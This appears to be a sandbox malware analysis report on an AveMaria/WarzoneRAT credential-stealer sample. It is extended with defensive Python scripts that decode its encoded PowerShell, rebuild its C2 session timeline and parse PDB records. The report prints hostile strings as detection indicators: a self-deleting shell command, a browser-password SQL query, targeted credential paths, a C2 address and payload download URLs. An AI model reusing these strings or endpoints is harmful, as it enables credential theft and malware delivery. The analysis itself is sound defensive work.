

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
Analysis ID:756122
MD5:373574c70ab6f299813fdafa9c12ab9b
SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
Tags:exe

Detection

AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected AveMaria stealer
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Contains functionality to hide user accounts
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe (PID: 5016 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe MD5: 373574C70AB6F299813FDAFA9C12AB9B)
    • powershell.exe (PID: 1328 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4168 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 1248 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6100 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup
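The process tree above is what a responder reads first, so the following Python (an added example, not code from Joe Sandbox or from the sample) transcribes it and performs the two checks behind the signatures "Encrypted powershell cmdline option found" and "Uses ipconfig to lookup or modify the Windows network settings": it decodes the -ENC argument (base64 of a UTF-16LE script; the one above decodes to start-sleep -seconds 45), reads the sleep duration out of the decoded script, and looks for a parent that ran ipconfig /release followed by ipconfig /renew. The 30-second threshold for a "long" sleep is an assumption chosen for the example.

```python
import base64
import re

# Process tree transcribed from this report: (pid, parent pid, command line).
PROCESS_TREE = [
    (5016, 0,    r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe"),
    (1328, 5016, r'"powershell" Get-Date'),
    (4168, 5016, r'"C:\Windows\System32\cmd.exe" /c ipconfig/release'),
    (1248, 4168, r"ipconfig /release"),
    (2748, 5016, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA=='),
    (5776, 5016, r'"C:\Windows\System32\cmd.exe" /c ipconfig/renew'),
    (6100, 5776, r"ipconfig /renew"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the prefix family rather than the literal "-ENC" seen in this sample.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
# Start-Sleep <n>, Start-Sleep -s/-Seconds <n>, Start-Sleep -m/-Milliseconds <n>
SLEEP_RE = re.compile(r"(?i)start-sleep\s+(?:-(s[a-z]*|m[a-z]*)\s+)?(\d+)")


def decode_encoded_command(cmdline: str):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def sleep_seconds(script: str):
    """Seconds requested by the first Start-Sleep in the script (milliseconds converted), or None."""
    m = SLEEP_RE.search(script)
    if not m:
        return None
    unit, n = m.group(1), int(m.group(2))
    return n / 1000.0 if unit and unit.lower().startswith("m") else float(n)


def _norm(cmdline: str) -> str:
    # "ipconfig/release" and "ipconfig /release" are the same command; strip all whitespace.
    return re.sub(r"\s+", "", cmdline.lower())


def ipconfig_reset_parents(tree):
    """PIDs whose children ran 'ipconfig /release' and, later, 'ipconfig /renew' (a network reset)."""
    found = []
    for pid, _, _ in tree:
        kids = [_norm(c) for _, parent, c in tree if parent == pid]
        rel = next((i for i, c in enumerate(kids) if "ipconfig/release" in c), None)
        ren = next((i for i, c in enumerate(kids) if "ipconfig/renew" in c), None)
        if rel is not None and ren is not None and rel < ren:
            found.append(pid)
    return found


def triage(tree, long_sleep=30.0):
    """Human-readable findings for the tree; long_sleep (seconds) is an assumed threshold."""
    findings = []
    for pid, parent, cmd in tree:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(f"PID {pid} (parent {parent}): -EncodedCommand decodes to {decoded!r}")
            secs = sleep_seconds(decoded)
            if secs is not None and secs >= long_sleep:
                findings.append(f"PID {pid}: sleeps {secs:g}s inside encoded PowerShell (likely sandbox evasion)")
    for pid in ipconfig_reset_parents(tree):
        findings.append(f"PID {pid}: spawned ipconfig /release followed by /renew (network reset)")
    return findings


if __name__ == "__main__":
    for line in triage(PROCESS_TREE):
        print(line)
```

The same decoder is worth keeping in any triage script: a 45-second sleep hidden behind -ENC is exactly what the "Sample execution stops while process was sleeping" signature is reacting to, and the release/renew pair explains why the sandbox sees the network drop and come back mid-run.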
{"C2 url": "62.102.148.158", "port": 62641}
Source | Rule | Description | Author | Strings
00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_AveMaria_31d2bce9 | unknown | unknown
  • 0x18e60:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x17748:$a2: SMTP Password
  • 0x16988:$a3: select signon_realm, origin_url, username_value, password_value from logins
  • 0x18ce8:$a5: for /F "usebackq tokens=*" %%A in ("
  • 0x17178:$a6: \Torch\User Data\Default\Login Data
  • 0x17ce4:$a8: "os_crypt":{"encrypted_key":"
  • 0x17610:$a10: \logins.json
  • 0x17c5c:$a11: Accounts\Account.rec0
  • 0x18a88:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack | INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | Detects executables embedding command execution via IExecuteCommand COM object | ditekSHen
  • 0x16f89:$r1: Classes\Folder\shell\open\command
  • 0x16fac:$k1: DelegateExecute
0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack | MALWARE_Win_WarzoneRAT | Detects AveMaria/WarzoneRAT | ditekSHen
  • 0x16554:$s1: RDPClip
  • 0x17358:$s2: Grabber
  • 0x16948:$s3: Ave_Maria Stealer OpenSource
  • 0x16a48:$s4: \MidgetPorn\workspace\MsgBox.exe
  • 0x1677e:$s5: @\cmd.exe
0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack | AveMaria_WarZone | unknown | unknown
  • 0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x16a74:$str2: MsgBox.exe
  • 0x16948:$str6: Ave_Maria
  • 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  • 0x15608:$str8: SMTP Password
  • 0x15fc0:$str12: \sqlmap.dll
0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
              No Sigma rule has matched
Timestamp:11/29/22-16:56:37.231932
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2852347
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:37.391216
Source IP:62.102.148.158
Destination IP:192.168.2.4
SID:2852350
Source Port:62641
Destination Port:49698
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:37.392528
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2852355
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:37.392528
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2852352
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:40.347271
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2839088
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:37.208383
Source IP:62.102.148.158
Destination IP:192.168.2.4
SID:2852346
Source Port:62641
Destination Port:49698
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:37.392528
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2839089
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:40.347271
Source IP:192.168.2.4
Destination IP:62.102.148.158
SID:2852351
Source Port:49698
Destination Port:62641
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/29/22-16:56:38.680309
Source IP:62.102.148.158
Destination IP:192.168.2.4
SID:2852354
Source Port:62641
Destination Port:49698
Protocol:TCP
Classtype:A Network Trojan was detected
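The nine alerts above are listed out of time order; sorted, they describe a single TCP session between the sandbox (192.168.2.4:49698) and the C2 from the extracted configuration. The following Python, an added example that is not part of the Joe Sandbox report, transcribes the alerts, labels each by direction relative to the C2 endpoint, and pairs each operator-side "...Command" with the victim's "...Response" of the same name, using the ETPRO rule names the Networking section lists for these SIDs.

```python
from datetime import datetime

# C2 endpoint from the configuration extracted in this report.
C2_IP, C2_PORT = "62.102.148.158", 62641

# ETPRO rule names for the SIDs, as listed in this report's Networking section.
SID_NAMES = {
    2852346: "InitializePacket",
    2852347: "BeaconResponse",
    2852350: "ListPasswordsCommand",
    2852351: "ListPasswordsResponse",
    2852352: "DownloadAndExecuteCommand",
    2852354: "RemoteModuleLoadResponse",
    2852355: "VNCGetModule",
    2839088: "Encrypted CnC KeepAlive Outbound (2)",
    2839089: "Encrypted CnC Checkin (2)",
}

# The nine Snort alerts transcribed from this report, in the order the report lists them:
# (sid, src_ip, src_port, dst_ip, dst_port, timestamp).
ALERTS = [
    (2852347, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:37.231932"),
    (2852350, "62.102.148.158", 62641, "192.168.2.4", 49698, "11/29/22-16:56:37.391216"),
    (2852355, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:37.392528"),
    (2852352, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:37.392528"),
    (2839088, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:40.347271"),
    (2852346, "62.102.148.158", 62641, "192.168.2.4", 49698, "11/29/22-16:56:37.208383"),
    (2839089, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:37.392528"),
    (2852351, "192.168.2.4", 49698, "62.102.148.158", 62641, "11/29/22-16:56:40.347271"),
    (2852354, "62.102.148.158", 62641, "192.168.2.4", 49698, "11/29/22-16:56:38.680309"),
]


def parse_ts(s: str) -> datetime:
    # Snort's default timestamp layout as printed in this report: MM/DD/YY-HH:MM:SS.micro
    return datetime.strptime(s, "%m/%d/%y-%H:%M:%S.%f")


def session_timeline(alerts, c2_ip=C2_IP, c2_port=C2_PORT):
    """Sort alerts by time and label each by direction relative to the C2 endpoint.

    Returns a list of (timestamp, direction, sid, rule_name). Alerts that do not involve
    the C2 endpoint are dropped. The sort is stable, so alerts that share a timestamp
    keep the order in which the report lists them.
    """
    events = []
    for sid, sip, sport, dip, dport, ts in alerts:
        if (dip, dport) == (c2_ip, c2_port):
            direction = "victim->c2"
        elif (sip, sport) == (c2_ip, c2_port):
            direction = "c2->victim"
        else:
            continue
        events.append((parse_ts(ts), direction, sid, SID_NAMES.get(sid, f"SID {sid}")))
    events.sort(key=lambda e: e[0])
    return events


def command_latencies(events):
    """Pair each C2-originated '...Command' with the victim's '...Response' of the same task
    name and return {task: seconds elapsed}. Responses with no preceding command are ignored."""
    pending, latencies = {}, {}
    for ts, direction, _sid, name in events:
        if direction == "c2->victim" and name.endswith("Command"):
            pending[name[: -len("Command")]] = ts
        elif direction == "victim->c2" and name.endswith("Response"):
            task = name[: -len("Response")]
            if task in pending:
                latencies[task] = (ts - pending.pop(task)).total_seconds()
    return latencies


if __name__ == "__main__":
    timeline = session_timeline(ALERTS)
    t0 = timeline[0][0]
    for ts, direction, sid, name in timeline:
        print(f"+{(ts - t0).total_seconds():7.3f}s  {direction:11}  {sid}  {name}")
    print(command_latencies(timeline))
```

Run as written, the timeline puts InitializePacket from the C2 at t+0, BeaconResponse from the victim 24 ms later, ListPasswordsCommand from the C2 at t+183 ms and ListPasswordsResponse from the victim at t+3.139 s, a 2.956 s round trip: the credential dump left the sandbox during the run, and the command arrived far too quickly after check-in to have been typed by a person. Three victim-side alerts (VNCGetModule, DownloadAndExecuteCommand, Encrypted CnC Checkin) share the timestamp 16:56:37.392528, which usually means one packet matched several content signatures, so read those as protocol-feature matches rather than as proof that each feature was exercised.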

              AV Detection

Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | Avira: detected
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | ReversingLabs: Detection: 37%
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe | Joe Sandbox ML: detected
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack | Malware Configuration Extractor: AveMaria {"C2 url": "62.102.148.158", "port": 62641}
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49701 version: TLS 1.2
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb | source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb | source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
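The two "Binary string" lines above recovered a PDB path from the unpacked payload's memory dumps. That path is carried in the CodeView RSDS record the linker embeds in a PE, together with a GUID and an "age" counter that identify the exact PDB build; GUID plus age is the most reliable pivot for finding other builds of the same project, because it survives re-packing while the file hash does not. The following Python, an added example that is not part of the Joe Sandbox report, scans an arbitrary byte blob (file or memory dump) for RSDS records, parses them, and derives the symbol-server lookup key. The blob is constructed for the example: the path is the one from this report, while the GUID and age are made up because the report does not show them.

```python
import re
import struct
import uuid

# CodeView PDB 7.0 record layout:
#   char[4] "RSDS" | GUID (16 bytes, Windows mixed-endian layout) | uint32 age | NUL-terminated PDB path
RSDS_HEADER_LEN = 4 + 16 + 4


def find_rsds_records(blob: bytes):
    """Scan raw bytes for RSDS records and parse each one.

    Scanning for the signature instead of walking the PE debug directory is deliberate:
    in this report the path came out of process memory dumps (.sdmp), where the headers
    may be missing or paged out but the CodeView record itself usually survives.
    """
    records = []
    for m in re.finditer(rb"RSDS", blob):
        off = m.start()
        if off + RSDS_HEADER_LEN > len(blob):
            continue
        guid = uuid.UUID(bytes_le=blob[off + 4:off + 20])
        age = struct.unpack_from("<I", blob, off + 20)[0]
        end = blob.find(b"\x00", off + RSDS_HEADER_LEN)
        if end == -1:
            continue
        path = blob[off + RSDS_HEADER_LEN:end]
        # A genuine PDB path is printable ASCII; anything else is a chance "RSDS" hit.
        if not path or any(b < 0x20 or b > 0x7E for b in path):
            continue
        records.append({"offset": off, "guid": str(guid), "age": age, "path": path.decode("ascii")})
    return records


def symbol_server_key(record) -> str:
    """Symbol-store key (<GUID hex, uppercase><age hex>) under which the PDB would be filed.
    Two binaries sharing this key were linked against the same PDB build."""
    return uuid.UUID(record["guid"]).hex.upper() + format(record["age"], "X")


def pdb_filename(record) -> str:
    return record["path"].replace("\\", "/").rsplit("/", 1)[-1]


# Constructed test blob. The path is the one recovered in this report; the GUID and age are
# invented for the example (the report does not show them). A second, bogus "RSDS" hit with a
# non-printable path is included to show that the printable-ASCII filter rejects it.
FAKE_GUID = uuid.UUID("12345678-1234-5678-9abc-def012345678")
SAMPLE_BLOB = (
    b"\x00" * 32
    + b"RSDS" + FAKE_GUID.bytes_le + struct.pack("<I", 1)
    + rb"C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb" + b"\x00"
    + b"\x00" * 16
    + b"RSDS" + b"\xff" * 20 + b"\x01\x02\x03\x00"
)

if __name__ == "__main__":
    for rec in find_rsds_records(SAMPLE_BLOB):
        print(f"offset {rec['offset']:#x}  age {rec['age']}  key {symbol_server_key(rec)}  {rec['path']}")
```

Pointed at the .sdmp dumps this report references, the same scan yields the real GUID and age for nope.pdb; the "Ring3 CRAT x64" project name and the W7H64 user name in the path are developer-environment artifacts worth recording alongside the C2 indicators.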

              Networking

Source: Traffic | Snort IDS: 2852346 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 62.102.148.158:62641 -> 192.168.2.4:49698
Source: Traffic | Snort IDS: 2852347 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Traffic | Snort IDS: 2852350 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 62.102.148.158:62641 -> 192.168.2.4:49698
Source: Traffic | Snort IDS: 2852355 ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Traffic | Snort IDS: 2852352 ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Traffic | Snort IDS: 2839089 ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2) 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Traffic | Snort IDS: 2852354 ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse 62.102.148.158:62641 -> 192.168.2.4:49698
Source: Traffic | Snort IDS: 2839088 ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2) 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Traffic | Snort IDS: 2852351 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse 192.168.2.4:49698 -> 62.102.148.158:62641
Source: Malware configuration extractor | URLs: 62.102.148.158
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1 | Host: filetransfer.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /storage/download/1tQUp1sCtsBK HTTP/1.1 | Host: s23.filetransfer.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1 | Host: filetransfer.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /storage/download/EmFT04AdCdjg HTTP/1.1 | Host: s23.filetransfer.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1 | Host: filetransfer.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1 | Host: filetransfer.io | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: powershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://filetransfer.io
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Mqombsglp.exe.0.dr | String found in binary or memory: http://filetransfer.io/data-package/XK4aNvBX/download
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://filetransfer.io/data-package/XK4aNvBX/download
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://filetransfer.io4
Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: powershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581841256.0000000002541000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://s23.filetransfer.io4
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | DNS traffic detected: queries for: filetransfer.io
